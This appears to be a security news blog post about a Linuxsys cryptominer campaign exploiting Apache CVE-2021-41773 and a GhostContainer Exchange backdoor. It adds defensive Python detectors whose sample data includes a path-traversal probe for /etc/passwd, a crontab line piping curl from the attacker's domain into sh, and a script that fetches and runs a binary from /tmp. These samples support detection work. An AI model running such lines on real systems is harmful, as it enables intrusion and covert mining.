Cyber Web Spider Blog – News

Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner

Posted on July 17, 2025 By CWS

Jul 17, 2025Ravie LakshmananCryptocurrency / Vulnerability
Cybersecurity researchers have discovered a new campaign that exploits a known security flaw impacting Apache HTTP Server to deliver a cryptocurrency miner called Linuxsys.
The vulnerability in question is CVE-2021-41773 (CVSS score: 7.5), a high-severity path traversal vulnerability in Apache HTTP Server version 2.4.49 that could result in remote code execution. The traversal lets a request map to files outside the directories configured by Alias-style directives; it only reaches files that are not already covered by the default “require all denied” policy, and it turns into code execution when CGI scripts are enabled for the affected path. The fix shipped in 2.4.50 was incomplete (tracked as CVE-2021-42013) and the issue was fully resolved in 2.4.51.
“The attacker leverages compromised legitimate websites to distribute malware, enabling stealthy delivery and evasion of detection,” VulnCheck said in a report shared with The Hacker News.
The infection sequence, observed earlier this month and originating from an Indonesian IP address 103.193.177[.]152, is designed to drop a next-stage payload from “repositorylinux[.]org” using curl or wget.
The payload is a shell script that's responsible for downloading the Linuxsys cryptocurrency miner from five different legitimate websites, suggesting that the threat actors behind the campaign have managed to compromise third-party infrastructure to facilitate the distribution of the malware.
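The check below is an added example, not code from the article or from VulnCheck's report. It parses Apache combined-format access log lines, percent-decodes the request path (twice, to catch double encoding) and counts path segments to see whether the decoded path climbs above the document root. The log lines and IP addresses are constructed; the `.%2e/` request shape is the publicly documented form of CVE-2021-41773 probes, and the example shows why a check run on the still-encoded path misses it, which is the encoded-dot handling mistake in the 2.4.49 path normaliser.

```python
"""Flag CVE-2021-41773-style traversal probes in Apache access logs.

Added example (not the article's or VulnCheck's code). SAMPLE_LOG is
constructed; the IPs are from documentation ranges.
"""
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def decode_path(raw: str, rounds: int = 2) -> str:
    """Strip the query string and percent-decode up to `rounds` times so a
    double-encoded '%252e' ('%2e' after one pass, '.' after two) is caught."""
    path = raw.split("?", 1)[0]
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_docroot(path: str) -> bool:
    """Walk the segments with a depth counter; a '..' that would take the depth
    below zero escapes the document root. Only a literal '..' counts, so this
    must run on the *decoded* path: on the raw '/cgi-bin/.%2e/.%2e/etc/passwd'
    the segments are '.%2e', not '..', and the check passes."""
    depth = 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def scan_access_log(lines):
    """Return one finding per request whose decoded path escapes the docroot."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than crash
        raw = m.group("path")
        decoded = decode_path(raw)
        if escapes_docroot(decoded):
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "raw": raw,
                "decoded": decoded,
                "status": m.group("status"),
                # traversal under /cgi-bin/ is the code-execution path when mod_cgi is on
                "via_cgi": decoded.startswith("/cgi-bin/"),
            })
    return hits


# Constructed sample: one traversal probe, one double-encoded variant, and benign
# traffic including an in-tree '..' that resolves inside the docroot.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Jul/2025:04:12:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Jul/2025:04:12:03 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1406 "-" "curl/7.88.1"
198.51.100.7 - - [10/Jul/2025:04:13:00 +0000] "GET /images/a/../b.png HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jul/2025:04:13:02 +0000] "GET /docs/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 196 "-" "python-requests/2.31"
192.0.2.44 - - [10/Jul/2025:04:14:10 +0000] "GET /static/app.js?v=2 HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{h['ip']} {h['status']} cgi={h['via_cgi']} {h['raw']} -> {h['decoded']}")
```

A 200 on a `/cgi-bin/` traversal is the line to escalate on; a 403 or 404 for the same shape is still a probe worth correlating with the source IP, since the campaign moves on to the curl/wget drop only where the first request works.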

“This approach is clever because victims connect to legitimate hosts with valid SSL certificates, making detection less likely,” VulnCheck noted. “Additionally, it provides a layer of separation for the downloader site (‘repositorylinux[.]org’) since the malware itself isn't hosted there.”
The sites also host another shell script named “cron.sh” that ensures the miner is launched automatically upon a system reboot. The cybersecurity firm said it also identified two Windows executables on the hacked sites, raising the possibility that the attackers are also going after Microsoft's desktop operating system.
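Because the miner is staged on otherwise legitimate hosts with valid certificates, URL or certificate reputation alone will not flag the fetches; the host-side traces the article does describe, a `cron.sh`-style reboot entry and a curl/wget pull from the downloader domain, are what to key on. The triage below is an added example, not the article's or VulnCheck's code: it parses crontab text for `@reboot` entries, commands that live in user-writable directories and jobs that download at run time, and pulls every curl/wget URL out of shell scripts, marking hosts that match the two downloader domains named in this article. The crontab, the stage-2 script, the `/tmp/.x/` path and the URL paths under those domains are constructed for the example, and the `cdn*.example.net` hosts stand in for the unnamed compromised sites.

```python
"""Host triage for the cron persistence and curl/wget staging described above.

Added example, not the article's or VulnCheck's code. Only the two downloader
domains come from the article; every path, file name and sample below is
constructed.
"""
import re
from urllib.parse import urlparse

# Downloader domains named in the article (defanged there as repositorylinux[.]org/.com).
STAGING_DOMAINS = {"repositorylinux.org", "repositorylinux.com"}

# Locations writable without root; a cron job running code from here is rarely legitimate.
USER_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

# "@reboot cmd" or "m h dom mon dow cmd"
CRON_LINE_RE = re.compile(r"^\s*(?P<sched>@\w+|(?:\S+\s+){5})(?P<cmd>.+)$")
# curl/wget followed, within the same command, by a literal http(s) URL
FETCH_RE = re.compile(r"\b(?P<tool>curl|wget)\b[^\n|;&]*?(?P<url>https?://[^\s'\"|;&]+)")


def parse_crontab(text):
    """Return (schedule, command) pairs, skipping comments, blanks and VAR=value lines."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if "=" in line.split()[0]:  # e.g. SHELL=/bin/sh, PATH=...
            continue
        m = CRON_LINE_RE.match(line)
        if m:
            entries.append((m.group("sched").strip(), m.group("cmd").strip()))
    return entries


def suspicious_cron_entries(text):
    """Return (schedule, command, reasons) for entries that deserve a second look."""
    flagged = []
    for sched, cmd in parse_crontab(text):
        reasons = []
        if sched == "@reboot":
            reasons.append("runs at reboot")  # the cron.sh behaviour from the article
        if any(d in cmd for d in USER_WRITABLE):
            reasons.append("command path in user-writable dir")
        if re.search(r"\b(curl|wget)\b", cmd):
            reasons.append("downloads at run time")
        if reasons:
            flagged.append((sched, cmd, reasons))
    return flagged


def find_fetches(text):
    """Every curl/wget URL in a shell script or crontab, with its hostname."""
    out = []
    for m in FETCH_RE.finditer(text):
        host = (urlparse(m.group("url")).hostname or "").lower()
        out.append({"tool": m.group("tool"), "url": m.group("url"), "host": host,
                    "known_staging": host in STAGING_DOMAINS})
    return out


def triage(crontab_text, script_texts):
    """Combine both checks over a crontab and any scripts it references."""
    fetches = []
    for text in [crontab_text, *script_texts]:
        fetches.extend(find_fetches(text))
    return {"cron": suspicious_cron_entries(crontab_text), "fetches": fetches}


# Constructed root crontab: one normal job, one reboot persistence entry, one
# periodic re-download. The URL path "stage2.sh" is hypothetical.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/bin:/bin
# system housekeeping
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
@reboot /bin/sh /tmp/.x/cron.sh >/dev/null 2>&1
*/10 * * * * curl -fsSL http://repositorylinux.org/stage2.sh | sh
"""

# Constructed stand-in for the second-stage script: tries one host, falls back to another.
SAMPLE_STAGE2 = """\
#!/bin/sh
mkdir -p /tmp/.x
curl -fsSL https://cdn1.example.net/images/ld -o /tmp/.x/ld || \\
wget -q https://cdn2.example.net/assets/ld -O /tmp/.x/ld
chmod +x /tmp/.x/ld && /tmp/.x/ld
"""

if __name__ == "__main__":
    report = triage(SAMPLE_CRONTAB, [SAMPLE_STAGE2])
    for sched, cmd, why in report["cron"]:
        print(f"CRON  {sched:<12} {cmd}  [{', '.join(why)}]")
    for f in report["fetches"]:
        tag = "KNOWN STAGING" if f["known_staging"] else "review"
        print(f"FETCH {f['tool']:<5} {f['host']:<24} {tag}  {f['url']}")
```

Feed it the output of `crontab -l` for each user plus `/etc/crontab` and the `/etc/cron.d` files, and hand `find_fetches` any script a flagged entry points at; fetches from hosts that are not in the known list still need a look, since by VulnCheck's account the miner itself sits on compromised sites the indicator list will not name.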
It's worth noting that attacks distributing the Linuxsys miner have previously exploited a critical security flaw in OSGeo GeoServer GeoTools (CVE-2024-36401, CVSS score: 9.8), as documented by Fortinet FortiGuard Labs in September 2024.
Interestingly, the shell script dropped following the exploitation of that flaw was downloaded from “repositorylinux[.]com,” with comments in the source code written in Sundanese, an Indonesian language. The same shell script has been detected in the wild as far back as December 2021.

Some of the other vulnerabilities exploited to deliver the miner in recent years include:

CVE-2023-22527, a template injection vulnerability in Atlassian Confluence Data Center and Confluence Server
CVE-2023-34960, a command injection vulnerability in Chamilo Learning Management System (LMS)
CVE-2023-38646, a command injection vulnerability in Metabase
CVE-2024-0012 and CVE-2024-9474, authentication bypass and privilege escalation vulnerabilities in Palo Alto Networks firewalls

“All of this suggests that the attacker has been conducting a long-term campaign, employing consistent techniques such as n-day exploitation, staging content on compromised hosts, and coin mining on victim machines,” VulnCheck said.

“Part of their success comes from careful targeting. They appear to avoid low interaction honeypots and require high interaction to observe their activity. Combined with the use of compromised hosts for malware distribution, this approach has largely helped the attacker avoid scrutiny.”
Exchange Servers Targeted by GhostContainer Backdoor
The development comes as Kaspersky disclosed details of a campaign that's targeting government entities in Asia, likely with an N-day security flaw in Microsoft Exchange Server, to deploy a bespoke backdoor dubbed GhostContainer. It's suspected that the attacks may have exploited a now-patched remote code execution bug in Exchange Server (CVE-2020-0688, CVSS score: 8.8), a fixed-key ViewState deserialization flaw in the Exchange Control Panel that requires valid user credentials to exploit.

The “sophisticated, multi-functional backdoor” can be “dynamically extended with arbitrary functionality through the download of additional modules,” the Russian company said, adding “the backdoor grants the attackers full control over the Exchange server, allowing them to execute a wide range of malicious activities.”
The malware is equipped to parse instructions that can execute shellcode, download files, read or delete files, run arbitrary commands, and load additional .NET byte code. It also includes a web proxy and tunneling module.
It's suspected that the activity may have been part of an advanced persistent threat (APT) campaign aimed at high-value organizations, including high-tech companies, in Asia.
Not much is known about who's behind the attacks, although they're assessed to be highly skilled owing to their in-depth understanding of Microsoft Exchange Server and their ability to transform publicly available code into advanced espionage tools.
“The GhostContainer backdoor does not establish a connection to any [command-and-control] infrastructure,” Kaspersky said. “Instead, the attacker connects to the compromised server from the outside, and their control commands are hidden within normal Exchange web requests.”
For defenders, that design means outbound-beacon detection will not surface it; the inbound IIS and Exchange request logs and the .NET assemblies loaded into the Exchange worker processes are where the evidence lives.



Copyright © 2025 Cyber Web Spider Blog – News.
